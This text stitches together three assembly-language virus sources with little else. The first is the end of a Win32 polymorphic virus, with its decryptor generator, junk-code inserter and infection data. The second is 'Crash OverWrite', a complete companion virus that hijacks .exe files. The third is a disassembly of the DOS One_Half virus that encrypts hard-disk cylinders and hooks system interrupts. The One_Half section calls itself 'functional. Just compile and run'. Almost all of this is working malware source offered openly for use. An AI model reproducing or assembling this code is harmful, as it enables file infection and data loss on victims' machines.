; ************************************************* **************************; ----------------[ Generate a pesudo-random Number ]------------------------; ************************************************* **************************
GetRand :; generate a pseudo-random NR.; based on some initial registers
push ecx ; and the Windows - Ontimeadd ecx , eaxcall dword ptr [ ebp+XGetTickCount ]add eax , ecxadd eax , ecxadd eax , edxadd eax , ediadd eax , ebpadd eax , dword ptr [ ebp+PolyLen ]add eax , dword ptr [ ebp+LoopLen ]
sub eax , esisub eax , ebx
pop ecxadd eax , ecx
add al , byte ptr [ ebp+Reg1]add ah, byte ptr [ ebp+Reg2]
or eax , eaxjne GetOutRandmov eax , 87654321hinc eax
GetOutRand :xor edx , edx ; clean edx ( needed to be able to divide later )div ecx ; Random Numer is in EAX
; RND No. 'till ECX in EDXret
; ************************************************* **************************; ----------------------[ Generate a Poly Decryptor ]------------------------; ************************************************* **************************
genPoly :and dword ptr [ ebp+PolyLen ], 0h
push 10hpop ecxcall GetRand ; get a random number to start
; and save it as the new key used for all files
mov byte ptr [ ebp+PolyKey ], al
call GetRegs
lea edi , [ ebp+PDecrypt ] ; here starts the decryptor
call RandJunk; we have 3 different ways to put ; the size in ecx and 3 different ways; to get the starting offset in esi
push 2h ; divide by 2pop ecxcall GetRand ; get a random number to decide what we do
; first; we need these 2 values before we start the; decryption loop !
; if edx = 1 we use the second onedec edx ; chose the Orderjz SecondOrder
FirstOrder :call GenerateESI ; esi comes first and ecx followscall RandJunkcall GenerateECX ; and 4 different ways to get size in excjmp Polypreparefinished ; so there is nothing static here !
SecondOrder : ; ecx comes first and esi followscall GenerateECXcall RandJunkcall GenerateESI
Polypreparefinished : ; we finished the preparing and can start the loop; we need a ; xor byte ptr [esi], key ( or other crypto ); inc esi / add esi, 1h; loop Decryptor / dec ecx , jnz Above ..
; lenght of loop = 0and dword ptr [ ebp+LoopLen ], 0
; now we choose the way we crypt this thing !
push 5hpop ecxcall GetRandmov dword ptr [ ebp+CryptType ], edx
XorDecrypt : ; we use a simple XOR BYTE PTR [ESI], KEYdec edxjnz NegDecrypt
mov ax , 3680h ; xor byte ptr [esi]stosw
mov al , byte ptr [ ebp+PolyKey ]stosb
; increase sizes ( we will add the last 2 bytes lat er )add dword ptr [ ebp+LoopLen ], 1hadd dword ptr [ ebp+PolyLen ], 1h
jmp EndPolyCrypto
NegDecrypt : ; neg byte ptr [esi]dec edxjnz NotDecryptmov ax , 1EF6h
stoswjmp EndPolyCrypto
NotDecrypt : ; not byte ptr [esi]dec edxjnz IncDecryptmov ax , 16F6hstoswjmp EndPolyCrypto
IncDecrypt : ; inc byte ptr [esi]dec edxjnz DecDecryptmov ax , 06FEhstoswjmp EndPolyCrypto
DecDecrypt : ; dec byte ptr [esi]mov ax , 0EFEhstosw
EndPolyCrypto : ; add the last 2 bytesadd dword ptr [ ebp+LoopLen ], 2hadd dword ptr [ ebp+PolyLen ], 2h
call RandJunk ; more junk.. ;)
; now we need to increase esi; to crypt the next byte
push 3hpop ecxcall GetRand
IncESI1 :dec edxjnz IncESI2
mov al , 46h ; do a simple inc esistosb
jmp EndIncESI
IncESI2 : ; add esi, 1hdec edxjnz IncESI3
mov al , 83hstosbmov ax , 01C6hstosw
jmp EndIncESI2
IncESI3 : ; clc, adc esi, 1h
mov eax , 01d683f8hstosd
add dword ptr [ ebp+LoopLen ], 1hadd dword ptr [ ebp+PolyLen ], 1h
EndIncESI2 :
add dword ptr [ ebp+LoopLen ], 2hadd dword ptr [ ebp+PolyLen ], 2h
EndIncESI :add dword ptr [ ebp+LoopLen ], 1hadd dword ptr [ ebp+PolyLen ], 1h
call RandJunk ; more, and more..
; now esi is incremented and we just have to do; the loop
push 3hpop ecxcall GetRand
LoopType1 : ; we use the most common form : loop ;)dec edxjnz LoopType2
mov al , 0e2hstosb
call StoreLoopLen
jmp EndLoopType
LoopType2 : ; we do a dec ecx, jnzdec edxjnz LoopType3
mov ax , 7549hstosw ; correct Loop Size ( dec ecx = 1 byte )add dword ptr [ ebp+LoopLen ], 1hcall StoreLoopLen
add dword ptr [ ebp+PolyLen ], 1h
jmp EndLoopType
LoopType3 :mov eax , 0F98349h ; dec ecx cmp ecx, 0hstosdadd dword ptr [ ebp+LoopLen ], 4hmov al , 75h ; jnestosbadd dword ptr [ ebp+PolyLen ], 3hcall StoreLoopLen
EndLoopType :add dword ptr [ ebp+PolyLen ], 2h
mov byte ptr [ edi ], 0C3h ; save the ending retadd dword ptr [ ebp+PolyLen ], 2h
mov eax , VirusSize ; calculate the new size for the virusadd eax , dword ptr [ ebp+PolyLen ]mov dword ptr [ ebp+VirLen ], eax
ret
StoreLoopLen :xor eax , eax ; calculate the size for the loopmov ax , 100h
sub eax , dword ptr [ ebp+LoopLen ]sub eax , 2hstosb
ret
; ************************************************* **************************; --------------------------[ Insert Junk Code ]-- --------------------------; ************************************************* **************************RandJunk : ; edi points to the place where they will be stored
; we will insert 1-8 junk instructionspush 7d ; each time this routine is calledpop ecxcall GetRandxchg ecx , edxinc ecx
push ecx
RandJunkLoop :push ecx
push 8hpop ecxcall GetRand ; get a random number from 0 to 7xchg eax , edx
lea ebx , [ ebp+OpcodeTable ]xlat ; get the choosen opcodestosb ; and save it to edixor eax , eax ; clean eax
; get first Registermov al , byte ptr [ ebp+Reg1]shl eax , 3h ; multiply with 8add eax , 0c0h ; add base
; add the second registeradd al , byte ptr [ ebp+Reg2]stosb ; save opcode
XchangeRegs : ; we get new ones and exchange themCall GetRegs ; cause the rnd - generator relies on them *g*mov al , byte ptr [ ebp+Reg1]mov ah, byte ptr [ ebp+Reg2]mov byte ptr [ ebp+Reg1], ahmov byte ptr [ ebp+Reg2], al
pop ecx ; restore ecxloop RandJunkLoop ; and loop
pop ecx ; we need the additional lenghtshl ecx , 1 ; multiply with 2
; save itadd dword ptr [ ebp+LoopLen ], ecxadd dword ptr [ ebp+PolyLen ], ecx
ret
OpcodeTable :db 08Bh ; movdb 033h ; xordb 00Bh ; or
db 02Bh ; subdb 003h ; adddb 023h ; anddb 013h ; adcdb 01Bh ; sbb
GetRegs : ; select two registers to use; set to Error
pushadmov byte ptr [ ebp+Reg1], - 1mov byte ptr [ ebp+Reg2], - 1
lea edi , [ ebp+Reg1]mov ecx , 2
; now we choose 2 registers we use
NextReg : ; to make the junk code look realisticpush ecxpush 8hpop ecxcall GetRandpop ecx
cmp edx , 1h ; we will not use ECXje NextRegcmp edx , 4h ; ESPje NextRegcmp edx , 6h ; or ESI, cause these values are importantje NextReg ; for the decryptor or the virus to work.mov al , dl ; save itstosbloop NextReg
popadret
; ************************************************* **************************; -------------------------[ Get esi from stack ]-- --------------------------; ************************************************* **************************
GenerateESI :; the first thing we do is to get the ; start of the crypted code, this is simpel,; it is our return address, so we get it from; stack; there are 3 different ways we can do this
push 3hpop ecxcall GetRanddec edx ; which way to we use ?
jnz ESI2
ESI1 :lea esi , [ ebp+movESI] ; use the mov esi, [esp] instructionmovsw ; 3 bytes longmovsbadd dword ptr [ ebp+PolyLen ], 3h
jmp EndESI ; get back
ESI2 : ; we simply pop esi and push it againdec edxjnz ESI3
mov al , 5eh ; pop esistosbmov al , 56hstosb ; push esiadd dword ptr [ ebp+PolyLen ], 2hjmp EndESI
ESI3 :push 5hpop ecxcall GetRandxchg eax , edxcmp al , 1h ; if we got ecx, we use eaxjne ESI3bxor eax , eax
ESI3b :mov edx , eaxpush edx ; save edxadd eax , 58h ; pop a register
stosb
pop eax ; push the value againpush eaxadd eax , 50hstosb
mov al , 08bh ; and finally move it to esistosbpop eaxmov al , 0f0hadd al , dlstosbadd dword ptr [ ebp+PolyLen ], 4h
EndESI :ret
; code to retrieve the start of crypt-codemovESI db 8bh , 34h , 24h ; mov esi, [esp]
; ************************************************* **************************; --------------------------[ Move the size to ECX ]-------------------------; ************************************************* **************************
GenerateECX : ; here we put the size of the crypted; part in ecx
push 3hpop ecxcall GetRand ; random Nr in edxinc edx ; increase
ECX1: ; use a simple movdec edxjnz ECX2
mov al , 0b9h ; movcall StoreALValue
jmp EndECX
ECX2: ; let's use a push ( value )dec edx ; pop ecxjnz ECX3
mov al , 068h ; pushcall StoreALValue
mov al , 59h ; save the pop ecxstosbadd dword ptr [ ebp+PolyLen ], 1h
jmp EndECX
ECX3:push - 1pop ecxcall GetRandmov eax , VirusSizeshl edx , 26dshr edx , 26dsub eax , edx
push eax ; mov ecx, Size - Xmov al , 0b9hstosb ; and the size we need to decryptpop eaxstosbcall StoShrEAX
mov ax , 0c181h ; add ecx, Xstoswxor eax , eaxmov al , dl
stosbcall StoShrEAXadd dword ptr [ ebp+PolyLen ], 11d
jmp EndECX ; finish
StoreECX : ; save the movpush ax ; save the register
mov al , 0b8h ; save the mov reg, sizeadd al , dlcall StoreALValue
mov al , 03h ; add ecx, regstosbpop ax ; get the chosen registeradd al , 0c8hstosb
add dword ptr [ ebp+PolyLen ], 4h
EndECX: ; let's return
ret
StoShrEAX : ; to save dwords backwardspush 3pop ecx
StoShrEAXLoop :shr eax , 8stosbloop StoShrEAXLoop
ret
StoreALValue : ; we store the instruction in alstosb ; and the size we need to decryptmov eax , FirstLSize ; eax, sizestosbcall StoShrEAX
add dword ptr [ ebp+PolyLen ], 5hadd dword ptr [ ebp+LoopLen ], 5h
ret
; ************************************************* **************************; -------------------[ Data which does not travel ] --------------------------; ************************************************* **************************VirusEnd : ; ok, this data will travel, but will be generated
; new on each run
PDecrypt : ; here will we add the polymorphic; decryption routine later, but not included; into 1.st generation
ret ; so we just return
db 150d dup ( 0h) ; we keep 150 bytes free, so we have a buffer; for the poly decryptor
; here we save the data which does not; travel which each copy of the virus
PolyKey db (?) ; key for the poly decryptorPolyLen dd (?) ; lenght of decryptorVirLen dd (?) ; virus lenght + decryptorLoopLen dd (?) ; lenght of the decryption loopCryptType dd (?) ; we save which kind of encryption we use
Reg1 db (?) ; here we save the registers we use for the junkReg2 db (?) ; code
SEH_Save dd (?) ; We save the original SEH
; Handles of the dll's we useK32Handle dd (?) ; Kernel32.dll might be nessecairy *g*IHLHandle dd (?) ; Imagehlp.dll to create checksumsADVHandle dd (?) ; Advapi32.dll for registry accessW32Handle dd (?) ; Winsck32.dll for pinging
; The Offsets of the API's we useXLoadLibraryA dd (?) ; Here we save their OffsetXGetProcAddress dd (?)
XFindFirstFileA dd (?)XFindNextFileA dd (?)XFindClose dd (?)XCreateFileA dd (?)XSetFileAttributesA dd (?)XCloseHandle dd (?)XCreateFileMappingA dd (?)XMapViewOfFile dd (?)XUnmapViewOfFile dd (?)XGetWindowsDirectoryA dd (?)XGetSystemDirectoryA dd (?)XGetCurrentDirectoryA dd (?)XSetCurrentDirectoryA dd (?)XGetFileAttributesA dd (?)XGetTickCount dd (?)XCreateThread dd (?)XGetSystemTime dd (?)
XCheckSumMappedFile dd (?)
XRegOpenKeyExA dd (?)XRegQueryValueExA dd (?)XRegCloseKey dd (?)
Xsocket dd (?)XWSACleanup dd (?)XWSAStartup dd (?)Xclosesocket dd (?)Xsendto dd (?)Xsetsockopt dd (?)
; Data to search KernelKernelAddy dd (?) ; Pointer to kernel PE-HeaderMZAddy dd (?) ; Pointer to kernel MZ-Header
RegHandle dd (?) ; Handle to open Reg-Key
; Directory'swindir db 7Fh dup ( 0) ; here we save the directory'scurdir db 7Fh dup ( 0) ; we want to infect
; some data for infectioncounter dw (?) ; a counter to know how many names we have comparedATableVA dd (?) ; the Address Table VANTableVA dd (?) ; the Name Pointer Table VAOTableVA dd (?) ; the Name Pointer Table VA
NewSize dd (?) ; we save the new size of the file hereCheckSum dd (?) ; checksumHeaderSum dd (?) ; crc of header
; Data to find files
WIN32_FIND_DATA label byteWFD_dwFileAttributes dd ?WFD_ftCreationTime FILETIME ?WFD_ftLastAccessTime FILETIME ?WFD_ftLastWriteTime FILETIME ?WFD_nFileSizeHigh dd ?WFD_nFileSizeLow dd ?WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?WFD_szFileName db 260d dup (?)WFD_szAlternateFileName db 13 dup (?)WFD_szAlternateEnding db 03 dup (?)
FileHandle dd (?) ; handle of fileMapHandle dd (?) ; Handle of MapMapAddress dd (?) ; offset of Map
Attributes dd (?) ; saved File-AttributesthreadID dd (?) ; payload runs in an extra thread
; we need this buffer for follwing; the shortcuts
Buffer db 337d dup (?); this buffer is nessecairy; to create a winsock connection ( ping )
WSA_DATA db 400d dup ( 0)
SystemTime : ; needed to get the current daywYear dw (?)wMonth dw (?)wDayOfWeek dw (?) ; Sunday = 0, Monday = 1 .. etc.wDay dw (?)wHour dw (?)wMinute dw (?)wSecond dw (?)wMilliseconds dw (?)
EndBufferData :; ************************************************* **************************; ------------------------[ That's all folks ]----- --------------------------; ************************************************* **************************end Virus
; comment *;; Name: Crash OverWrite :-); Coder: BeLiAL;; This is my first win32 virus.Its only a; companionvirus but it does his work very; well.Its perhaps coded a bit lame but; im sure nobody will care.It infects the; first file in the directory and renames; the victimfile to .dat .I perhaps i; make it resident or infecting more file...; Greetings and thanx go out; to Evul,Toro,Padisah and Wallo.;; BeLiAL;*
.386
.model flatLocalsJumps
Extrn FindFirstFileA : PROCExtrn FindNextFileA : PROCExtrn CreateFileA : PROCExtrn WriteFile : PROCExtrn ReadFile : PROCExtrn GlobalAlloc : PROCExtrn GlobalFree : PROCExtrn ExitProcess : PROCExtrn WinExec : PROCExtrn CopyFileA : PROCExtrn CloseHandle : PROCExtrn SetFilePointer : PROCExtrn GetFileSize : PROC
.data
MAX_PATH EQU 0ffhFALSE EQU 0changeoffset EQU 094fhwinsize EQU 05h
FILETIME structdwLowDateTime DWORD ?dwHighDateTime DWORD ?FILETIME ends
WIN32_FIND_DATA structdwFileAttributes DWORD ?ftCreationTime FILETIME <>ftLastAccessTime FILETIME <>ftLastWriteTime FILETIME <>nFileSizeHigh DWORD ?nFileSizeLow DWORD ?dwReserved0 DWORD ?dwReserved1 DWORD ?cFileName BYTE MAX_PATHdup(?)cAlternate BYTE 0eh dup (?)endsFindFileData WIN32_FIND_DATA <>
memptr dd 0counter1 dd 0filehandle dd 0filesize dd 00001000hexefile db '*.exe' , 0myname db 'crashoverwrite.exe' , 0
dd 0dd 0
secbuffer dd 0dd 0dd 0dd 0db '[Crash OverWrite] coded by BeLiAL'
.code
start :push offset FindFileDatapush offset exefilecall FindFirstFileA
already_infected :mov eax ,dword ptr nFileSizeLow.FindFileDatacmp eax , 00001000hje reanimatemov eax , offset cFileName.FindFileData
find_dot1 :cmp byte ptr ds :[ eax ], '.'je next_step1add eax , 1jmp find_dot1
next_step1 :add eax , 1push eaxmov byte ptr ds :[ eax ], 'd'add eax , 1mov byte ptr ds :[ eax ], 'a'add eax , 1mov byte ptr ds :[ eax ], 't'mov ebx , offset cFileName.FindFileDatamov eax , offset secbuffer
find_dot2 :mov dh,byte ptr ds :[ ebx ]cmp edx , 0je next_step2mov byte ptr ds :[ eax ], dhadd ebx , 1add eax , 1jmp find_dot2
next_step2 :pop eaxpush FALSEpush offset secbuffermov byte ptr ds :[ eax ], 'e'add eax , 1mov byte ptr ds :[ eax ], 'x'add eax , 1mov byte ptr ds :[ eax ], 'e'push offset cFileName.FindFileDatacall CopyFileApush FALSEpush offset cFileName.FindFileDatapush offset mynamecall CopyFileA
open_victim :push 0push 080hpush 3hpush 0hpush 0hpush 0c0000000hpush offset FindFileData.cFileNameCall CreateFileAmov filehandle , eaxcmp eax , 0ffffffffhje reanimate
getmemory :push filesizepush 0Call GlobalAlloc ;get the memorymov edx , eaxcmp eax , 0je close_filepush edx
copyinmemory :push 0push offset counter1push filesizepush edxpush filehandleCall ReadFilepop edxmov dword ptr memptr , edx ;for later useadd edx , changeoffsetmov eax , offset cFileName.FindFileData
modify_victim :mov bh,byte ptr ds :[ eax ]mov byte ptr ds :[ edx ], bhcmp bh, 0je set_pointeradd eax , 1add edx , 1jmp modify_victim
set_pointer :push 0push 0push 0push filehandlecall SetFilePointer
copy_to_file :push 0push offset counter1push filesizepush memptrpush filehandlecall WriteFile
close_file :push filehandlecall CloseHandle
reanimate :mov eax , offset myname
find_dot3 :mov bx ,word ptr ds :[ eax ]cmp bx , 'e.'je next_step3cmp bx , 'E.'je next_step3
add eax , 1jmp find_dot3
next_step3 :add eax , 1mov byte ptr ds :[ eax ], 'd'add eax , 1mov byte ptr ds :[ eax ], 'a'add eax , 1mov byte ptr ds :[ eax ], 't'add eax , 1mov byte ptr ds :[ eax ], 00h
that_was_all :push winsizepush offset mynamecall WinExec
final :push 0call ExitProcess
endsend start
; Virus One_Half; Disassembly done by Ratter
; It's a polymorfic reverzibel multiparit virus fro m Slovak coder known; under the nick Vyvojar(==Developer). It's also au thor of Level3.; This is a disassembly I enjoyed the most. It's a one of the best virus; in the dead world of DOS.; It's functional. Just compile and run :)
; To Vyvojar: If ya're still living, could ya pls l emme know about it?; I would be very happy if i could speak with you sometimes ...; To otherz who are reading this: Pls lemme know if there's any bug in the code.; Or just to say ya like this :); You can reach me on Undernet channel #virus, #3c or via email: [email protected]
; Compile:; tasm /t/m2 one_half.asm; tlink /t one_half.obj
.486p
.487
seg_a segment byte public use16assume cs : seg_a , ds : seg_a
org 100h
one_half proc farstart :
jmp loc_08d1 ; jmp to viruz_start;jmp loc_0208 ; jmp to decode routine_start
db 101 dup ( 0)loc_0168 :
db 81h , 0C0h, 0FEh, 6Eh ; add ax, 6EFEhjmp loc_056c;db 19 dup ( 0)
loc_0182 :cldstdjnz short loc_01B1jmp loc_08D1;db 40 dup ( 0);
loc_01B1 :xor [ di ], axjmp short loc_0168;db 64 dup ( 0);
loc_01f5 :db 2eh ; cs:mov di , 582hdb 36h ; ss:db 3eh ; ds:jmp loc_049b;db 10 dup ( 0);
loc_0208 :push axnopdb 36h ; ss:stidb 36h ; ss:clcstijmp loc_0381;db 367 dup ( 0);
loc_0381 :push cscldjmp loc_047c;db 246 dup ( 0);
loc_047C :nopstidb 36h ; ss:clcnoppop dsdb 36h ; ss:jmp loc_01f5;db 21 dup ( 0);
loc_049b :clddb 3eh ; ds:mov ax , 0bfbahdb 3eh ; ds:stdjmp loc_01b1;db 148 dup ( 0);
loc_0539 :db 81h , 0FFh, 5Ah, 13h ; cmp di, 135ahstijmp loc_0182;db 43 dup ( 0);
loc_056c :clcsticmcdb 3eh ; ds:nopinc didb 36h ; ss:jmp loc_0539pop ss;db 12 dup ( 0);
;
loc_0582 :;
p label nearp_ equ offset the_second_part - offset boot_startp__ equ presun_rutiny + ( p - buffer )
;_mcb_ db 'Z' ; it'z last_block
dw 9F01h ; PSPdw 0FFh ; 4096 bytezdb 3 dup (?) ; reserveddb 'COMMAND', 0 ; blockz_owner_name ...;
exe_header dw 20CDh ; exe_signaturepart_pag dw 501ehpage_cnt dw 09b4hrelo_cnt dw 0hdr_size dw 21cdhmin_mem dw 1f58hmax_mem dw 0bac3hrelo_ss dw 03d0hexe_sp dw 0efe8hexe_flag db 00h ; checksum
db 0b4hexe_ip dw 0100hrelo_cs dw 0FFF0htabl_off dw 0BA05h
;decode_routine_table :
dw 0208h ; here'z the tabledw 0381h ; of offsetz, where aredw 047ch ; the chunkz of code ofdw 01f5h ; decode_routinedw 049bh
xor_offset dw 01b1hdw 0168hdw 056chdw 0539h
jnz_offset dw 0182h;
beginning_ofs dw 07beh;
overwritten_bytez :db 06h , 83h , 05h , 00h , 00h , 2Ehdb 8Ch, 0Eh, 85h , 05h , 4Fh, 02hdb 00h , 2Eh, 0A1h, 0A3h, 05h , 26hdb 0C7hdb 'G.com <jmen'db 0Bh, 26h , 3Ah, 47h , 21h , 0BAhdb 4Ah, 05h , 0Fhdb '„_driveru>' , 0Ah, 't'db 0FFh, 0C6h, 44h , 0FFh, 00h , 0B8hdb 03h , 4Bh, 0BBh, 80h , 00h , 8Ahdb 0Ch, 0Ah, 0C9h, 0BAh, 68h , 04hdb 0Fhdb 'ys ...' , 0Ah, 0Dh, '$'db 17hdb 'instalovan'db 02h , 0EBh, 03h , 0E9h, 43h , 02hdb 4Eh, 56h , 89h , 36h;
;hdr_size_ dw 10h
date_div dw 1Ehpage_size_ dw 200h
;
; Here starts boot_version of One_Halfboot_start :
xor bx , bxclimov sp , 07c00h ; set up stackmov ss , bx ; 2 0000h:7c00hstimov ds , bxsub word ptr ds :[ 413h ], 4 ; dec mem_size o 4 kilamov cl , 6int 12h ; gimme mem_sizeshl ax , cl ; count the segmentmov dx , 80h ; first harddisk, 0. headmov es , ax ; my_new_seg 2 esdb 0b9h ; mov cx, ?
viruz_start_sec dw 0bh ; gimme virus_start_secmov ax , 0207h ; read 7 seczpush es ; (viruz_body)int 13hmov ax , offset the_second_part - ppush axretf ; go2 new_segment_part;
the_second_part :mov word ptr ds :[ 21h * 4 + 2], cs ; store cs 2 21h * 4 + 2mov ax , word ptr ds :[ 46ch ] ; gimme tick_counterpush dspush cs ; make ds = cspop dsmov word ptr ds :[ mov_bx_? - p], ax ; store countermov ax , csinc axmov word ptr ds :[ _mcb_ + 1 - p], ax ; store block_ownermov byte ptr ds :[ run_jmp - p], 0; nulluj displ8 2 set our
; own _mcb_ as last_onecall sub_078b ; move presun_rutinypop esmov bx , sp ; 7c00h 2 bxpush esmov si , word ptr es :[ bx +p_] ; gimme cur_cyl_number_
; _2_cryptdb 81h , 0feh ; cmp si, ?
lowest_cyl dw 07h ; less than lowest_cyl ?jbe loc_06d6push si ; nopesub si , 2 ; ok crypt 2 cylinderzmov word ptr ds :[ not_crypt_cyl - p], si ; store cyl - 2pop simov ah, 08h ; gimme drivez_paramzint 13hjc loc_06d6 ; error ?mov al , cl ; gimme max_sec_numberand al , 03fh ; voklesti max_secmov byte ptr ds :[ secz_count - p__ ], al ; secz_2_cryptmov cl , 1 ; starting_sec 2 clmov bh, 7eh ; buffer_ptr 2 7e00hmov word ptr ds :[ buf_ptr - p__ ], bx ; store buffer_ptrmov dl , 80h ; set up drive 2 first harddisk
loc_069E :
dec si ; dec cylinder_numbercall sub_0798 ; convert cyl_numberpush dx
loc_06A3 :mov ah, 2 ; read 1 cylinderpush axint 13hpop axjc short loc_06B4 ; error ?db 0e8h ; call crypt_dw offset crypt_ - presun_rutiny + buffer - next_
next_ label near ; crypt_ itinc ah ; make function 03hpush axint 13h ; and write crypted_cylpop ax
loc_06B4 :jc short loc_072B ; error ?test dh, 3Fh ; last head ?jz short loc_06BFdec dh ; dec headjmp short loc_06A3 ; and go on
loc_06BF : ; yopepop dxdb 81h , 0feh ; cmp si, ?
not_crypt_cyl dw 1bfh ; ok 2 cylinderz crypted_ ?ja loc_069E
loc_06C6 : ; yopemov bh, 7Ch ; buffer 2 7c00hmov es :[ bx +p_], si ; store new cur_cyl_number_2_mov ax , 301h ; _cryptmov cx , 1 ; and write partition_tablemov dh, ch ; (boot_start) backint 13h
loc_06D6 :mov ds :[ cur_cyl_number - p__ ], sidb 81h , 0feh ; cmp si, ?
one_half_cyl dw 136h ; more than one_half_crypted ?ja short loc_06E3call sub_07EC ; ok try 2 write text
loc_06E3 : ; nope not yetmov ax , 201h ; ok now readmov bx , 7C00h ; 2 buffer 7c00hmov cx , ds :[ viruz_start_sec - p] ; gimme viruz_...dec cx ; go2 orig_partition_tablemov dx , 80h ; orig_partition_tableint 13hcliles ax , dword ptr es :[ 13h * 4] ; gimme old_int_13hmov ds :[ old_int_13h - p__ ], ax ; and store itmov ds :[ old_int_13h - p__ + 2], espop espush esles ax , dword ptr es :[ 1ch * 4] ; gimme old_int_1chmov ds :[ old_int_1ch - p], ax ; and store itmov ds :[ old_int_1ch - p + 2], espop espush es ; set up my ownmov word ptr es :[ 13h * 4], offset new_int_13h - p__mov word ptr es :[ 13h * 4 + 2], cs ; new_int_13hmov word ptr es :[ 1ch * 4], offset new_int_1ch - pmov word ptr es :[ 1ch * 4 + 2], cs ; and new_int_1chsti
push bxretf ; and jump 2 orig_partition
; Diz uncryptz_cylinderz if any error occurezloc_072B :
xor ah, ahpush axint 13h ; try 2 reset the diskpop ax
loc_0731 :inc dh ; inc headmov ah, dh ; head 2 ahpop dx ; pop max_headpush dxcmp ah, dh ; cmp cur_head with max_headja short loc_074E ; above ?mov dh, ah ; cur_head 2 dhmov ah, 2 ; read cylinderpush axint 13hpop axdb 0e8h ; call crypt_dw offset crypt_ - presun_rutiny + buffer - next__
next__ label near ; uncrypt_ itinc ahpush axint 13h ; and write it backpop axjmp short loc_0731
loc_074E : ; yope (error on first_cyl)pop dx ; pop max_headinc si ; inc cyl_numberjmp loc_06C6 ; and end with crypt_
new_int_1ch :push axpush dspush esxor ax , axmov ds , axles ax , dword ptr ds :[ 21h * 4] ; gimme int_21hmov cs :[ old_int_21h - p__ ], ax ; store offsetmov ax , es ; gimme segcmp ax , 800h ; are we under 800h ?ja short loc_0783mov word ptr cs :[ old_int_21h - p__ + 2], ax ; yope
; we've got dos_int_21h_segles ax , dword ptr cs :[ old_int_1ch - p] ; gimme old_int_1chmov ds :[ 1ch * 4], ax ; restore it backmov word ptr ds :[ 1ch * 4 + 2], esmov word ptr ds :[ 21h * 4], offset new_int_21h - p;and set upmov word ptr ds :[ 21h * 4 + 2], cs ; my new_int_21h
loc_0783 : ; nopepop espop ds ; restore regzpop ax ; anddb 0EAh ; jmp far ptr old_int_1ch
old_int_1ch dw 0FF53h , 0F000h
one_half endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz movez some routinez ...sub_078B proc near
mov si , offset presun_rutiny - pmov di , offset buffer - pmov cx , offset f_read_ - offset presun_rutiny - 4cldrep movsbretn
sub_078B endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz makez from cyl_number_in_si valid cx_regsub_0798 proc near
push axmov ax , simov ch , alpush cxmov cl , 4shl ah, clpop cxmov al , 3Fh ; '?'and dh, aland cl , alnot alpush axand ah, alor dh, ahpop axshl ah, 1shl ah, 1and ah, alor cl , ahpop axretn
sub_0798 endp
text_ db 'Dis is one half.' , 0Dh, 0Ah, 'Pr'db 'ess any key to continue ...' , 0Dhdb 0Ah
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz writez text if run_counter is even and it iz even day etc.sub_07EC proc near
mov ah, 4 ; gimme CMOS date_&_timeint 1Ahjc short loc_ret_0816test dl , 3 ; day even etc. ?jnz short loc_ret_0816test word ptr ds :[ run_counter - p], 1; run_counter is evenjnz short loc_ret_0816mov cx , offset sub_07ec - offset text_ ; gimme text_lengthmov si , offset text_ - p ; gimme text_offsetmov ah, 0Fh ; gimme cur_video_page_numberint 10h ; why ?mov bl , 7mov ah, 0Eh ; print char 2 cur_page ...
locloop_080D :lodsb ; gimme byteint 10hloop locloop_080D ; and go on
xor ah, ah ; wait 4 keyprezzint 16h
loc_ret_0816 :retn ; and end ...
sub_07EC endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz callz int_21h_file_fc with a handle in bxsub_0817 proc near
push bxdb 0bbh ; mov bx, ?
handle_ dw 0 ; gimme handleint 21h ; call int_21hpop bxretn ; and end ...
sub_0817 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz callz int_13hint_13h proc near
pushfclidb 9Ah ; call far ptr int_13h_addr
int_13h_addr dw 774h , 70hretn
int_13h endp
; This is used for int_13h tracingnew_int_01h :
push bpmov bp, spdb 0ebh
jump_patch_? db offset loc_084f - ($ + 1) ; jmp short loc_084Fdb 81h , 7eh , 04h ; cmp word ptr [bp+4], ?
which_segment_? dw 0253hja short loc_0853push axpush bxpush dslds ax , dword ptr [ bp+2]db 0bbh
new_int_01h_mov_bx_? dw 5200h ; mov bx, ?mov cs :[ int_13h_addr - p][ bx ], axmov cs :[ int_13h_addr - p + 2][ bx ], dsmov byte ptr cs :[ jump_patch_? - p][ bx ], offset loc_084f - ( offset jump_patch_? + 1)pop dspop bxpop ax
